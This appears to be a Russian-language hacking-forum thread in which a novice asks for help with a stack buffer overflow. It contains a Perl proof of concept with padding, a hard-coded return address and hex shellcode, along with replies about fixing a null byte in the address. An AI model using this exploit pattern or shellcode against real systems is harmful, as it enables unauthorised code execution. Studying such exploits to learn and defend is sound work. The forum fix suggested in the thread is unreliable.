лучше тему в реверсинг.
эксплойт никуда не надо вбивать... надо шел код вбивать.

ТС, вот для кого грейт старался, писал статью, все разъяснял, с примерами, а?
Неужели так трудно заюзать поиск по форуму?

http://forum.antichat.ru/thread26791.html

разобрался только неможу вбить правельний адрес возврата.
вбиваю "\x40\xfb\x22\x00" а оно вместо первих нулей пишет 20.
што делать подскажите.

Ладно обясню по подробней.
есть мой exploit на Perl:
#!perl
$Poc = "\x61" x28;
$returnadr = "\x40\xfb\x22\x00";
$shellcode = "\x33\xC0\xB8\x8F".
"\x7A\x83\x7C\x68".
"\x00\x04\x00\x00".
"\x68\x00\x03\x00".
"\x00\xFF\xD0\x33".
"\xC0\xB8\xFA\xCA".
"\x81\x7C\xFF\xD0";
print "$Poc$returnadr$shellcode";.
загвоздка в том што строка "\x40\xfb\x22\x00" должна давать адрес возврата 0022fb40,а она почемуто вместо етаво дайот 2022fb40.
тоесть "\x00" принимаетса за 20 ходя должно приниматса за 00.

смини в стрроке \x40\xfb\x22\x00 на \x40\xfb\x22\x20 и все будит ok

зы: сначала прочол тему как у мня "переполнение мочевого пузыря" г г г

тоже сомое.